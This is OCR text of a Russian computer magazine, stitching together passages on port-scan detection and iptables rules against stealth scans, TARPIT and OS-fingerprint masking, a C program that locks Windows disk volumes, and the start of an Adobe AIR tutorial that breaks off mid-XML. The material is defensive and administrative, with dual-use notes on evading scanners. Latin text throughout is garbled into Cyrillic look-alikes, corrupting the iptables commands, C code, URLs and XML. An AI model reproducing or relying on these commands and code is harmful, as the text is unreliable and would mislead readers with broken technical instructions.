тиводействия ему путем использования обращений кір^аЫез. Более того, 
РЗАБ содержит модуль опознания атакующего, который по значениям ТТІ_, 
ІР іб, Т05 и ТОР ѵѵіпбоѵѵ выдаст информацию об атакующем. 

3. Ркбитр ( ІтезбтеаДпеі/ргоіесІз/ркбигпр ) 

Обнаружение ТСР/ІЮР-видов сканирования. 

4. Азіаго РогіЗсап Оеіесііоп ПтезІітеаДпеі/ргоіесІз/азІагорзб ] 



Прототип творения Зоіаг Оезідпег. Ведетжурнал подключений путем взаи- 
модействия с зузіод. 

Все эти средства относятся к системам Р5А0 (РогіЗсап Аіаск Оеіесііоп). В 
литературе нередко можно встретить тезис о том, что сканирование портов 
является атакой, хотя оно лишь позволяетвыявить защитные механизмы на 
системе или их отсутствие. РАѴѴ-снифинг использует практически каждая 
вторая Ьозі-Ьазеб Ю5-система. Например, работа Эпогі: с включенным пла- 
гином РогЮсап Ріидіп ( ітезЬтеаДпеіУргоіес^з/рзсап-рІидіп ] состоиттолько 
в анализе логов. Поэтому нет ничего удивительного втом, что известней- 
шая система обнаружения вторжений является одновременно и пакетным 
снифером. 

РЭАй использует два критерия для того, чтобы определить сканирование: 

1) по перебору порта; 

2) по тайм-ауту на подключения к портам 

В НЕУДАЧИ РШбЕКРКШГА 

Одной из сторон маскарадинга является уход от возможности сканиро- 
вания портов путем урезания особых видовтрафика. Вотлишь несколько 
приемов, которые можно использовать: 

Боремся с ХМА5- сканированием: 

— А ШРЦТ — р Дер — ш Дер --Дср-ДІадз 

РШ , ЗУЫ , КЗТ , РЗН , АСК , ШС РШ , ЗУЫ , КЗТ , РЗН , АСК , ШС - б 
БКОР 

Боремся с МБЫі- сканированием: 

— А ШРІЛ? — р Дер — ш Дер --Дср-ДІадз 
РШ , ЗУЫ , КЗТ , РЗН , АСК , ШС ШЫЕ - б БКОР 

Боремся с ТСР соппесД ( ) и ЗШ-сканом: 

— А ШРБТ - р Дер - ш Дер --Дср-ДІадз РШ, ЗШ РШ, ЗШ - б 



Значения ТТІ_ в различных системах 
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Паника ЫМАР. На выбор с некоторой вероятностью сканнер выдает более 
десятка операционных систем, хотя система запущена под РгееВЗО 




3 процессе ЬИрргіпЕпд’а, Хзрібег выдает свои действия, т.к. использует 
слово «5САЫІМЕН» в некоторых запросах 




Все упомянутые в 
статье утилиты, при- 



меры скриптов ты 
найдешь на нашем 
диске. 




БКОР 

Боремся с РІЫ- сканированием: 

— А ІЫРІІТ — р Сер — ш Сер --Сср-СІадз РШ,АСК 

РШ-] БЮР 

Другая важная задача маскарадинга состоит в сокрытии 
версии операционной системы отудаленного анализа (05 
РіпдегргіпСіпд). Все утилиты, владеющие этим приемом, как 
правило, применяют следующие техники: 

1. Активное сканирование, входе которого отправляется пакет, 
получается ответ и производится его анализ. Сканер, к примеру, 
может проанализировать ответсервера на запрос ІСМР Есбо 
РедиезЕ изучив время жизни пакета и ряд других специфиче- 
ских параметров. Собственно, самым популярным инструментом 
подобного рода является РІ N0, который основан на использо- 
вании протокола Іпіегпеі Сопігоі Меззаде Ргоіосоі и ктомуже 
высылает ТТЕ. По логике вещей, основным противодействием 
многих администраторов является «урезание»такого трафика. 
При прохождении пакета через один маршрутизатор (хоп) 
время жизни пакета уменьшается на то количество времени, 
которое пакет «пробыл в маршрутизаторе», но так как это 
время чрезвычайно мало и врядли может превышать 1 
секунду, то именно это число берутза среднюю величину 
убыли. А поскольку на разных узлах количество хопов может 
быть различно, ТТЬ можетсравнительно отличаться от пере- 
численных эталонных значений. 

2. Пассивное сканирование не подразумевает отправку 
пакетов. Вместо этого один из интерфейсов переводится в 
прослушивающий режим, а сканер извлекает из собранных 
данныхте значения, которые посылаетудаленная машина при 
явном обращении к ней. 

Изменение параметров ТТЕ/ѴѴіпсІоѵѵ 5іге/МТІІ так или иначе 
влияеттолько на изменение характеристик стека, при этом 
сканеру отдается ложная информация. Иногда это может 
привести к неправильному функционированию рабочей 
станции, поэтому надо следить, чтобы введенные значения 
были корректны. Особенно внимательно стоит относиться к 
МТІІ — параметру, определяющему размер (в байтах) единицы 
информации, которая можетбыть передана на канальном 
уровне коммуникационного протокола. Для разных сетей этот 
параметр различен (в сетях х25 он самый маленький и состав- 
ляет 1 28 байт, а в ЕЕзегпеІ: — уже 1 500 байт). Сценарий для 
изменения для изменения ТТЪ и ѴѴіпсІоѵѵз 5ііе (под ѴѴіпсІоѵѵз, 
РгееВЗО, Еіпих), написанный автором на РуОзоп.ты найдешь 
на нашем диске. 



Н КРОНА СЛУЖБЕ ВЗЛОМЩИКА 

К большому сожалению, существуют способы опреде- 
ления ОС и по другим признакам. Например, РРС-раз- 
ведка. Так, небезызвестная утилита Крссіитр позволяет 
администратору опрашивать интересующие его устрой- 
ства и определять, готовы ли они к «общению» средства- 
ми указанного протокола, причем опрос выполняется с 
помощью того же протокола. Эта программа неоценима в 
ситуациях, когда надо выяснить причины неисправности 
удаленных систем, переставших реагировать на за- 
просы. Утилита предусматривает использование как низ- 
коуровневых сетевых протоколов, таких как ТОР, ІЮР, 

ІРХ и 5РХ, так и протоколов более высоких сеансового 
и прикладного уровней: N еі; В 1 0 5 оѵег ТСР/ІР ( N еЕ ВТ) , 
ЫеЫЗЕШ, МісгобоЙ Меззаде Оиеие Зегѵісез (М5М0), а 
также именованных каналов (патеб рірез). С помощью 
программы Ррсбитр можно определить, через какие 
порты удаленный сервер готов принимать сигналы и 
какие порты обеспечивают прохождение трафика сквозь 
средства сетевой защиты. Утилита входит в Резоигзе 
Зегѵег КіЕ А ответы различных серверов на РРС-запро- 
сов уже давно изучены. 

Стоитупомянуть важнейшее расширение ірІаЫез — ТарріЕ 
представляющее собой жестокое средство для наказания 
скрипткидисов. Злодей, попытавшийся открыть подклю- 
чение с портом-ловушкой, будет принудительно «прико- 
ван» к нему в течение определенного тайм-аута. Разорвать 
соединение с таким узлом не удастся, что непременно 
отразится на системных ресурсах атакующего, но ни в коем 
случае не доверенной системы. Делается такое зависание 
путем установления параметра ѴѴіпбоѵѵ 5ііе в ноль. Пример 
эмуляции ѴѴіпсІоѵѵз- служб для маскировки и одновремен- 
ной атаки: 

ірЕаЫез -А ШРТІТ -р Еср -ш Еср -ш трогЕ \ 

--(ЗрогЕз 135,139,1025 -д ТАК.РІТ 

При обращении на эти порты сразуже будетоказано 
противодействие. Подобный прием, замечу, зачастую 
используют для защиты от распределенных атак. Обрати 
внимание. Надо понимать, что сканеры безопасности 
создаются исключительно в законопослушных целях 
— для мониторинга сети и поиска ее слабых мест. Не 
надо нарушать закон и использовать их во вред. Это 
наказуемо ! цц 
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видно? Или просто блокировать, чтобы ни одна программа и особенно ви- 



русы не могли производить с ними никаких действий? Все это кажется про- 



стеишеи задачей, но только до тех пор, пока не приступаешь к ее решению. 
Оказывается, что в инете распространяются какие-то левые утилиты, кото- 
рые мало того, что платные — они ненадежны и сильно глючат. Но сегодня 
они нам и не потребуются! 



та история началась много лет назад, когда «Дятел» (винчестер 
типа I ВМ-ОТИА-30701 5), используемый в качестве вспомога- 
тельного накопителя, в результате естественной выработки 
подшипника начал свистеть, шуметь и вибрировать всем 
корпусом. Недолго думая, автор установил в настройках электропитания 
отключение диска через 3 минуты. Основой диск («Барракуда» отБеадаіе) 
работал бесшумно и, поскольку к нему постоянно обращались, никогда не 
отключался, а вот «Дятел» (куда складировались редко используемые фай- 
лы] по замыслу должен был уснуть и долго не просыпаться (благо машина 
перезагружается раз в месяц, а то и реже). Однако положенные три минуты 
истекли, а «Дятел» все никак не могугомониться. Еще добрых минут десять 
винчестер продолжал шуметь, пока не обнаружилось, что он конфликтует 
с Ргосезз Ехріогег’ом Марка Руссиновича. После его закрытия «Дятел», 
зевнув, отправился на покой: вибрации прекратились, и воцарилась дол- 
гожданная тишина. Ненадолго! Через некоторое время «Дятел» проснулся, 



вновь раскручивая свой шпиндель! Это агентѴѴіпсІоѵѵз подсуетился и 
сообщил, что на таком-то диске осталось мало места и не мешало бы его 
почистить. Вместо этого разъяренный мыщъх завалил самого агента! :) 
Несколько часов благословеннойтишины и... вновь грохот пробуждающе- 
гося «Дятла»! Какая служебная программа потревожила его на этот раз? Ах, 
М5 РЬоІо Ебйог, который при запуске зачем-то перечитывает все диски. А 
ОѴО-ОесгурІог при грабеже фильмов автоматически пытается записать их 
на диске наибольшим количеством свободного пространства, сканируя все, 
включая спящие. Тысячи программ нахально лезуттуда, куда их не просят, и 
далеко не каждую из них можно от этого отучить. 

Обозначенная проблема довольно актуальна (особенно на компьютерах, 
где воткнуто большое количество дисков, но основная нагрузка ложится на 
один из них, а остальные используются в резервных целях). И чтобы ее ре- 
шить, мыщъх стал искать пути блокировки дисковыхтомов, что, в конечном 
счете, оказалось полезным нетолько для усыпления дисков, но и защиты 
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данных от вирусных/хакерских атак. Даже если злоумышленникзахватит 
администратора (вместе со всеми правами], он все равно не сможетни 
открывать файлы, ни даже просматривать содержимое заблокированного 
тома. 

г В ДЕБРЯХ МЗБЫ 

Всякий, кто сталкивался с ѴѴіпсІоѵѵз, знает, что сЬЫзк.ехе блокирует 
дисковый том на время его лечения. Еще бы ! Попытка исправле- 
ния ошибок, сопровождаемая записью на диск со стороны других 
приложений, рискует превратить базовые структуры данных в кашу! 
Весьвопрос в том — какименно сЬЫзк.ехе осуществляет блокиров- 
ку? Он же ведь, зараза такая, ничего не говорит и исходных текстов 
нет (сейчас сырцами ѴѴіпсІоѵѵз забиты все файлообменные сети, но 
на тот моменту мыщъх’а их не было, так что приходилось плясать от 
печки]. 

Ну, нет и сходных те кето в — и не надо. Зато есть дизассемблер и М50Ы. Рас- 
потрошив сбксізк.ехе в ЮА Рго и натравив на него монитор ІОСТІ_-запросов, 
собранный на базе отладчика зо^-ісе (точка останова на АРІ-функцию 
ОеѵіѵеІоСопІгоІ с записью всех аргументов влог-файл], мыщъхопреде- 
лил, что блокировка дискового тома осуществляется путем посылки ему 
вполне документированной команды Р5СТІ__І_0СК_Ѵ0ШМЕ. Эта команда 
подробно описана в 5йК вместе с другими, среди которых значится и 
Р5СТЫЭІ5М0иМТ_Ѵ01_ІІМЕ, ставшая предметом одной забавной и в тоже 
время поучительной истории. 

Название Р5СТЕ_0І5М01ІМТ_Ѵ0ЕІ)МЕ свидетельствует, что команда 
предназначена для размонтирования дисков, а в мире ІЭ N I X это равносиль- 
но потере доступа к ним на логическом уровне вплоть до последующего 
монтирования. Воттолько ѴѴіпсІоѵѵз — это вам не Э N IX! Это совсем другой 
зверь. Вспомни, когда ты в ѴѴіпсІоѵѵз последний раз вручную монтировал 
дискету или Сй-ВОМ. Не помнишь? Вот, и я не помню. ѴѴіпсІоѵѵз, в отличие 
от Ы N IX, всегда монтирует диски автоматически! А5йК полезно читать 
последовательно — от корки до корки. В описании команды Р5СТІ__ 

□ І5М0ШМТ-Ѵ0ШМЕ недвусмысленно сказано, что размонтированныйтом 
обладает следующими свойствами: а) на нем отсутствуют открытые файлы; 
б) операционная система о нем «забывает». Казалось бы, то, что нам нужно! 
Ан нет, ниже следуетубийственная приписка, сообщающая, что операци- 
онная система попытается смонтировать демонтированныйтом при первой 
же попытке доступа к нему, в частности, вызов функции ОеНодісаШгіѵез 
заставит операционную систему смонтировать все демонтированные тома. 
Другими словами, кактолько мы нажмем <АІ_Т-Р1 >/<АІ_Т-Р2> в РАР’е или 
попытаемся просмотреть содержимоетома, операционная система автома- 
тически смонтируетего и никакой блокировки не получится! 

Обратимся к «голому» вызову Р5СТІ__1_0СК_Ѵ0І_1)МЕ, рекомендованному 
в описании команды Р5СТІ__0І5М01)МТ_Ѵ0І_ІІМЕ самой М5. Говорят, что 



использовать Р5СТІ__І_0СК_Ѵ0ШМЕ без Р5СТІ_0І5М0иЫТ_Ѵ0І_ІІМЕ ни в 

коем случае нельзя! Дескать, при этом операционная система не сбрасы- 
вает дисковые буфера и, если случайно забыть смонтироватьтом перед 
завершением работы ѴѴіпсІоѵѵз, диску придет капец. 

Что ж, открываем ЭйКи читаем: операционная система сбрасывает все 
дисковые буфера на том перед тем, как заблокирует его, в частности, все 
данные, находящиеся в кэш’е «ленивой записи» выгружаются на том. Ко- 
роче, насчетпотенциальных разрушений можно не волноваться. Вызывать 
Р5СТІ__0І5МСШМТ_Ѵ01_1)МЕ до блокировки тома — бесполезно, а после 
— невозможно (ОеѵісеІоСопІгоІ возвратит ошибку, в полном соответствии 
со спецификациями МісгозоіД. 

^ СКЕЛЕТ ПРОГРАММЫ 

Вдоволь накурившись ЭйК, пишем следующий код. Обработка ошибок с 
прочими второстепенными деталями для упрощения понимания опущена: 

СКЕЛЕТ ПРОГРАММЫ, БЛОКИРУЮЩЕЙ ДИСКОВЫЕТОМА 

НАЫБЬЕ ЬБеѵісе; БЖЖБ ІрВуЬезКеСигпесІ; 

ЫЭеѵісе = СгеабеЕіІе (Ьиб , ОЕЫЕКІС_КЕАБ | СЕЫЕЕІС_ШІТЕ , 
ЕІЬЕ_ЗНАКЕ_ЕЕАБ | ЕІЬЕ_ЗНАКЕ_ 
ШІТЕ , 0 , ОРЕЫ_ЕХІЗТІШ ,0,0) ; 

БеѵісеІоСопРгоІ (1іВеѵісе,ЕЗСТЬ_ШСК_ѴОШМЕ,ШЬЕ, 0 , 

ШЬЬ, 0 , &1рВуЦезКеЦигпес1, 0) ; 

Прежде чем отправлять то му команду Р5СТІ__І_0СК_Ѵ01_1)МЕ, его необходи- 
мо открыть АРРфункцией СгеаіеРіІе с флагами РІІ_Е_5НАРЕ_ВЕА0|РІ1_Е_ 
5НАРЕ_ѴѴРІТЕ, 0РЕІМ_ЕХІ5ТІМ6. Ну, с 0РЕ1\1_ЕХ15Т1Ме все понятно. Мы же 
не собираемся создавать новый дисковый том (имя которого, кстати говоря, 
записывается в формате «\\.\Х:»), а открываем уже существующий. Флаги 
РІІ_Е_5НАРЕ_ПЕА0|РІІ_Е_5НАРЕ_ѴѴПІТЕ способы легко ввести в заблуж- 
дение начинающих программистов, создавая впечатление, что заблокиро- 
ванный том будет доступен для совместной записи/чтения со стороны других 
приложений. Ничего подобного! Том будетзаблокирован намертво! Аэти 
флаги относятся к самому устройству, но не к команде Р5СТІ__1_0СК_Ѵ0ШМЕ. 
Перед блокировкой тома необходимо закрыть все открытые файлы и 
директории (втом числе не просматривать никакой каталог блокируемого 
тома в файловом менеджере), а также заручиться правами администрато- 
ра (например, прибегнув к помощи службы «гипаз»]. В противном случае 
ОеѵісеІоСопІгоІ возвратит ошибку. 

Заблокировать том заблокируем, а как его потом разблокировать обратно? 
Возвращаемся к МЭРЫ и читаем: том будет оставаться заблокированным, 
пока не совершится одно из следующих действий: а) приложение, заблоки- 
ровавшеетом, не вызовет команду Р5СТЕ_иЫІ_0СК_Ѵ0І_ІІМЕ; б) дескриптор 
тома не будетзакрыт вызовом СІозеНапсІІе или путем завершения процесса. 
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Р5СТІ_ЮСК_Ѵ0ШМЕ на МБРЫ 



/«V 







> ѵѵагпіпд 

Эксперименты с 
жесткими дисками 
чреваты потерей 
данных. Будь 
бдителен! 




> сіѵсі 

Бинарный файл, 
а также исходник 
разработанной авто- 
ром программы 
ты найдешь на диске 



Небольшое пояснение по поводу пункта (а). Подразумевается 
вполне определенное приложение (в данном случае, прило- 
жение, вызвавшее Р5СТІ__І_0СК_Ѵ0ШМЕ), никакое другое 
приложение не может разблокировать том посылкой команды 
Р5СТІ__І_0СК_Ѵ0ШМЕ. Э ксперименты это полностью 
подтверждают. То есть, если мы блокируем том, то остальные 
приложения, даже обладающие правами администратора, 
не смогут до него добраться, во всяком случае на логическом 
уровне. В принципе, обладая правами администратора, не- 
трудно прочитать/записать содержимое диска на физическом 
уровне, например, открыв устройство \\.\РРІѴ5ІСАІ_ВПІѴЕ2, 
но это уже перебор. РІормальная малварьтак не поступает, не 
говоря уже о пользователе типа «подружка». 

Теперь по поводу пункта (б). Кактолько наше приложение 
завершит работу, все заблокированные тома будут автомати- 
чески разблокированы и потому ничего другого не остается, 
кроме как резидентно болтаться в памяти, взаимодействуя с 
пользователем посредством командной строки или еще как. 
Обычно приложения, не создающие окон (то есть не имеющие 
пользовательского интерфейса) и работающие в фоновом 
режиме, оформляются в виде служб (они же системные 
сервисы). Мыщъх’у программировать службу было лень и он 
поступил проще: создал консольное приложение, а при его 
сборке указал линкеру, что это 0111, в результате чего удалось 
избежать создания консольного окна, загрязняющего своим 
присутствием «Рабочий стол». 

Уничтожение процесса через диспетчер задач приводит 
кавтоматической разблокировке всех заблокированных 
томов. Но это некрасиво и потому было решено создать 
именованный семафор «пе 2 иті_Іоск_тиІех», дожидаясь его 
освобождения с помощью АРІ-функции ѴѴаііРогБіпдІеОЬіесГ 
вгоняющей процесс в глубокий сон, чтобы он не кушал 
процессорное время. Повторный запуск программы с ключом 
«-геіеаве» освобождает семафор, передавая управление 
ѴѴаііРогБіпдІеОЬіесІ — пробуждая процесс ото сна итутже 
завершая его с закрытием дескрипторов всех заблокиро- 
ванныхтомов, что, какуже говорилось выше, приводит к их 
разблокировке. 

Достаточно простой, удобный и необычный способ блоки- 
ровки дисков от(не)преднамеренного обращения, а главное 
— надежный! Поскольку большинство из нас хранитархивные 
копии прямо на жестком диске (это удобнее, чем стример или 
С0/0Ѵ0-К/РѴѴ), то имеет смысл заблокировать архивный том, 
снимая блокировку только на время обновления архивов. 



^ КАК ПОЛЬЗОВАТЬСЯ ПРОГРАММОЙ 

Поскольку в комплект штатной поставки операционной систе- 
мы не входит утилита для блокировки дисковыхтомов, мыщъх 
наскоро написал свою собственную, обозвав ее иптоипЕс. 
Исходные тексты прилагаются к статье (как видно из названия, 
она создавалась еще в те далекие времена, когда мыщъх 
верил в могущество команды Р5СТ1__0І5М0иМТ_Ѵ0І_1)МЕ). 
Процедура сборки компилятором МБ ѴІ5иаІС++ выглядиттак: 

$с1.ехе /с ипшоипД.с 

$1іпк иптоипЕ.оЬ] / ЗЕШЗУЗТЕМ : ШЫБСМЗ ІІ5ЕК32 . 

ыв 

Внимание: если просто скопировать исходный текст в окно ЮЕ 
и сказать «Виіісі», мы получим пулеметную очередь ошибок, а 
все потому, что поумолчанию ЮЕ настроена на компиляцию 
С++ программ, а эта написана на чистом Си со всеми вольнос- 
тями в преобразованияхтипов. 

Для самых ленивых предлагается уже готовый к исполнению 
иптоипГехе. Его следует за пускать из командной строки 
со списком дисков, которые необходимо заблокировать, 
например: «иптоипСехе\\.\Х:\\.\Ѵ:\\.\2:», а разблокировать 
ранее заблокированныетома — «иптоипГехе — геіеаве». 
Выборочная разблокировка отдельныхтомов в программе не 
предусмотрена (желающие могут добавить ее сами). Также, 
в некоторых оболочкахтипа РАВ’а, во избежание возможной 
блокировки командой строки, ожидающей завершения прило- 
жения (которое в данном случае завершаться не собирается), 
рекомендуется использовать команду «5Іаіі», поддерживае- 
мую всеми версиями ѴѴіпсІоѵѵв, линейки ЫТ. 

Примечание: программа содержит несколько некритичных 
ошибок, которые мыщъх так и не удосужился исправить. В ча- 
стности, если запустить иптоипі не под администратором, то 
семафор будетуспешно создан, а вот при попытке блокировки 
томов возникнетошибка, но семафор останется цел и невре- 
дим. Повторный запускутилиты под администратором ни к 
чему не приведет, пока пользователь (от имени которого соз- 
дался семафор) не вызовет иптоипГехе с ключом «-геіеазе». 
Впрочем, это все мелочи. Главное — руководящая идея! 

^ РАЗМ0НТИР0ВАНИЕДИСК0ВЫХТ0М0В 

Альтернативный метод защиты дисков от (непреднамерен- 
ных обращений кданным заключается в удалении точки 
монтирования, что легко сделать с помощью штатной утилиты 



► 032 
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Куда подевался наш диск«А:\»? 

М0І1МТѴ0Ц входящей в комплект поставки ѴѴіпсІоѵѵз, кажется, еще начиная 
сѴѴ2К. 

При запуске без ключей она выдаетсписокточек монтирования, который 
выглядит приблизительно так: 

\\?\Ѵо1ите{ 986с8062-566а-1169-82а2 -80666172 6966} \ 

С : \ 

\\?\Ѵо1ите{986с8063-566а-1169-82а2-806661726966}\ 

Б: \ 

\\?\Ѵо1ите{986с8064-566а-1169-82а2-806661726966}\ 

Е:\ 

\ \ ? \Ѵо1ите{ 98 6с8 065-5 66а-1169-82а2 -80 666172 69 66} \ 

Ь:\ 

\\?\Ѵо1ише{ 986с8066-566а-11(19-82а2 -806(16172 6966} \ 

I : \ 

\\?\Ѵо1ише{986с8067-566а-11(19-82а2-806(161726966}\ 

а: \ 

\ \ ? \ Ѵоіише {986с8068-566а-11(19-82а2-806(161726966}\ 

К: \ 

\\?\Ѵо1ише{986с8069-566а-11(19-82а2-806(і6172 6966}\ 

Е:\ 

Длинная строка циферок, начинающаяся с «\\?\ѴоІите» — это и есть имя тома 
(не путать с меткой диска!]. Ниже идет точка монтирования, обычно представ- 
ляющая собой букву, однако операционные системы семейства ЫТ позволяют 
монтировать диски на каталоги любого другого тома (при условии, что этот 
каталог пустой], создавая файловые иерархии, характерные для ІЛЧІХ-систем. 
Допустим, мы хотим размонтировать диск «А:\». Что мы должны для этого 
сделать? Во-первых, приобрести права администратора, а во-вторых, 
отдать команду: 



Отключение неиспользуемых 
дисков через Менеджер Электро- 
питания — бесполезная операция, 
поскольку обращение кдискам 
(пробуждающее их ото сна] проис- 
ходит даже тогда, когда мы меньше 
всего этого ожидаем 

$МОШТѴОБ . ЕХЕ А : /Б 

Теперь диск«А:\» волшебным образом исчезает из системы и больше не 
отображается, создавая впечатление, что его вообще нет (а он ведь есть]. 

И потому малвари или другому программному обеспечению до него теперь 
так просто не добраться. 

Хорошо, а как смонтировать дискобратно? Нетничего проще! 

$КЕМ вызываем МОШГТѴОБ без ключей, чтобы увидеть имена 
дисков 

$МОШТѴОБ . ЕХЕ 

Возможные значения ИмениТома вместе с текущими точками 
подключения : 

\ \?\Ѵо1ите{ 986с8062-566а-11с19-82а2 -806(161726966 } \ 

С : \ 

\\?\Ѵо1ише{986с8063-566а-11(19-82а2 -806661726966} \ 

Б:\ 



\ \?\Ѵо1ите{ 986с8060- 566а- 1169- 82 а2- 8066617 26 966 } \ 

* * * НЕТ ТОЧЕК ПОДКЛЮЧЕНИЯ * * * 

\\?\Ѵо1ите{е34631с2-5654-11(і9-9ес4-с140са7 66429} \ 

Н:\ 

КЕМ видим имя \\?\Ѵо1ите{986с8060-566а-1169-82а2- 
806661726966} \ 

КЕМ без точек подключения. Это и есть наш бывший диск А: \ 
КЕМ сделаем из него диск В : \ 

$МОШТѴОБ В: \\?\Ѵо1шпе{986с8060-566а-1169-82а2- 
806661726966} \ 

Кстати говоря, операции поудалению/восстановлениюточки монтирова- 
ния можно осуществлять и через «Менеджер Дисков» (панель «Админист- 
рирование»). Там, в графике, оно понагляднее будет, зато командная строка 
легко автоматизируется путем написания Ьа}-файлов. Нотут на вкус и цвет 
все фломастеры разные. 

По надежности блокировка слегка выигрываету операции удаления точки 
монтирования (восстановить точку монтирования можетлюбое приложе- 
ние, а нетолько то, которое ееудалило), однако программного обеспечения, 
умеющего работать сточками монтирования, мыщъх’у пока не встречалось. 
Ктомуже, заблокированные диски остаются «болтаться» в «Проводнике» и 
РАК’е, мозоля глаза своим присутствием, а вотудалениеточек монтирова- 
ния убирает их из системы, но это опять-таки вопрос вкуса. 

г ВОТ ТАК! 

ѴѴіпсІоѵѵз — мощная и интересная система, таящая под своим капотом 
огромные возможности. Пока остальные устанавливают сложные (и дорого- 
стоящие) защитные комплексы, мы — хакеры — успешно обходимся своими 
силами, получая ничуть не худший, а зачастую даже лучший результат!^ 
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ВОЗДУШНАЯ 

ТЕХНОЛОГИЯ 

ОТАйОВЕ 



ИЗУЧАЕМ АРОВЕ АІР НА ПРАКТИКЕ 



Еще недавно мы с задором рассказывали об онлайн-приложениях, казав- 
шихся нам эдакой диковинкой. Теперь, когда онлайн-сервисы прочно вошли 
в нашу жизнь, мы нередко задумываемся о том, как совместить их с обыч- 
ным десктопными программами. Идея создания проги, которая выглядела 
бы как самое обычное приложение, но при этом обладала всеми плюсами 
онлайн-сервисов, витала в воздухе давно. И вот теперь, с появлением новой 
технологии АбоЪе АІК, это, наконец, стало возможным. 



□ то если веб-программист решит заняться программирова- 
нием обычных приложений для десктопа? Фактически это 
означает для него необходимость откинуть весь свой опыт 
программирования для веб и браться за изучение сложных объектно- 
ориентированных сред, как правило, зависимых от платформы. Стоп! 
Правильнее говорить не «означает», а «означало», потому как именно 
сейчас, наконец, появиласьтехнология, позволяющая веб-девелоперам, 
используя имеющийся багажзнаний, инструменты и даже заготовки 
кода, создавать полноценные десктопные приложения! Такие возмож- 

► 034 



ности по созданию РісЬ ІпІегпеІ Арріісаііоп (РІА) им предоставила новая 
разработка — АсіоЬе АІР. 

г ЧТО ТАКОЕ АІР 

Итак, АІР — это платформа от известнейшей компании АбоЬе, позволяю- 
щая веб-программистам создавать насыщенные интернет-приложения 
для десктопа. Подобно самым обычным приложениям, РІА могутобра- 
щаться кфайловой системе компьютера, управлять другими приложе- 
ниями, поддерживают бгад’п’сі гор, работаютс локальной базой данных 
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Дескриптор нашего приложения 
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Интерфейс для боодіе Апаіубсз, построенный на базе АсІоЬе АІР и Ріех 



и в тоже время обладают всеми теми возможностями, которые присущи 
онлайн-сервисам. Однако АІР — это не просто хитрый браузер. Это плат- 
форма, исполняемая среда (кстати говоря, АІР расшифровывается как 
АбоЬе Іпіедгаіеб Рипбте), позволяющая не только запускать созданные 
для нее приложения, но и дающая им возможность взаимодействовать 
им с системой, а также исполняться в защищаемой песочнице — запсІЬох. 
Такой подход дает массу преимуществ, одним из которых является 
кросс-платформенность. АІР-приложения уже сейчас можно запускать 
под ѴѴіпсІоѵѵз и Мае 05 X, а к финальному выходутехнологии разработчи- 
ки АбоЬе обещают разработать версию и для Ыпих’ов. Другое не менее 
важное преимущество заключается втом, что конечные приложения 
получаются очень небольшого размера, поскольку реализация всех фун- 
кций содержится в самой платформе. Фактически собранный бинарник 
— это просто контейнер из одного или более НТМІ_- или 5ѴѴР-файлов. 
Платформа АІР создает для них специальный контейнер, позволяя им 
запускаться в обычном окне с возможностями десктопных приложений и 
веб-сервисов одновременно. Правда, здесь есть и обратная сторона: без 
установленной АІР на компьютере пользователя ни одна разработанная 
для нее программа не заработает. Для того чтобы создать приложение, 
недостаточно только НТМІ_’ки и флешки, необходим еще и ХМІ_-файл, 
называемый также дескриптором приложения. В нем прописываются 
параметры программы, например название и размеры окна, и, что самое 
главное, указывается файл (НТМІ_ или 5ѴѴР), который загрузится в кон- 
тейнер и будет описывать внешний вид и функциональность приложе- 
ния. В результате своего рода компиляции получается аіг-файл, который 
легко запускается на любом компьютере, где есть платформа. 

В ПЕРВЫЙ ОПЫТ 

Итак, теперь, когда у тебя есть некоторая теоретическая база, пора 
закрепить полученные знания на практике. Можно было бы написать 
стандартное приложение Неііо ѴѴогІсП, но это слишком скучно. Давай 
подумаем: когда РІА-приложения могут проявить себя во всей красе? 
Очевидно, что в тех случаях, когда программа должна правильно функци- 
онировать, находясь как в онлайне, так и в оффлайне. Ну, скажем, если в 
АІР разработать систему для управления блогом (а такой пример есть на 
сайте АбоЬе), то она обязательно должна предоставлять пользователю 
возможность создавать пост (запись в дневнике) независимо оттого, есть 
ли в текущий момент подключение к инету или нет. Если пользователь 
находится онлайн, то никаких проблем не возникает и написанный пост 
сразу отсылается на сервер. Если же подключения к Сети нет, то програм- 
ма обязана сохранять пост (например, в локальной БОІЛе-базе данных) 
до тех самых пор, пока соединение с инетом не будет установлено, после 
чего отправить его. Задача хоть и несложная, но некоторых навыков все- 
таки требует, поэтому мы начнем с более простого примера. 

В главном окне нашего приложения разместятся три элемента: текстовое 
поле для поиска, кнопка Зеагсб, а также небольшая иконка, которая будет 



указывать на то, установлено ли соединение с инетом или нет. Если поль- 
зователь наберет что-то в текстовом поле и нажмет кнопку, то откроется 
окно браузера и будет произведен поиск, но... только втом случае, если 
компьютер находится онлайн. В противном случае кнопка для поиска 
будет заблокирована, а цвет иконки сообщит об отсутствии соединения. 
Таким образом, мы создадим полностью рабочее приложение, которое 
будет контролировать подключение к интернету и в зависимости от его 
наличия/отсутствия по-разному реагировать на действия пользователя. 
Круто? Тогда поехали. Нам потребуются две вещи: 

1. Непосредственно исполняемая среда АІР [ ЬирУЛаЬз.асІоЬе.сот/ 
сІоѵѵп[оасІ5/аіг.Ы:т[ ). необходимая для запуска аіг-файлов. Ее нужно прос- 
то установить в систему, никаких дополнительных настроек не требуется. 

2. Набор разработчика в виде БОК ( ЬирѴ/ІаЬз.асІоЬе.сот/сІоѵѵпІоасІз/ 
аігзсік.біті ). в котором содержатся утилиты, примеры кода, а также 
библиотеки, необходимые для разработки АІР-приложений. 5йК рас- 
пространяется в виде обычного архива, который следует распаковать. 
Комплект включает в себя две важные для нас утилиты: А01_, предназна- 
ченную для того, чтобы запускать и отлаживать приложения, а также АйТ, 
необходимую для создания аіг-контейнер, который можно распростра- 
нять. Чуть позже мы рассмотрим их более детально. 

В ДЕСКРИПТОР ПРИЛОЖЕНИЯ 

Процесс разработки любого приложения начинается с создания его 
дескриптора — специального файла вХМІ_-формате, в котором пропи- 
сываются все возможные параметры будущей программы. Делается это 
очень просто: в любом текстовом редакторе создается файл примерно 
следующего содержания: 

<?хш1 ѵегзіоп= " 1 . О " епсос1іпд= "и!:б-8 " ?> 

<арр1іса1:іоп хт1пз= "кССр : //пз . асІоЪе . сот/аіг/ 
арр1ісаСіоп/1 . О "> 

<бі1епате>Хакер іпеі: топіког</бі1епате> 

< си з Ъ отіірсіаі: еІЛ > б а 1 з е< / си з к отіірсіа 1: еІЛ > 

<пате>Хакер соппескіоп Мопібог</пате> 

<ісІ>ги . хакер . АІК.топіРог . кезб</ісЬ> 
<ѵегзіоп>2</ѵегзіоп> 

<іпікіа1Шзі(}оѵ7> 

<сопЬеп1:>Тезб . Ы:т1</сопЬепЬ> 

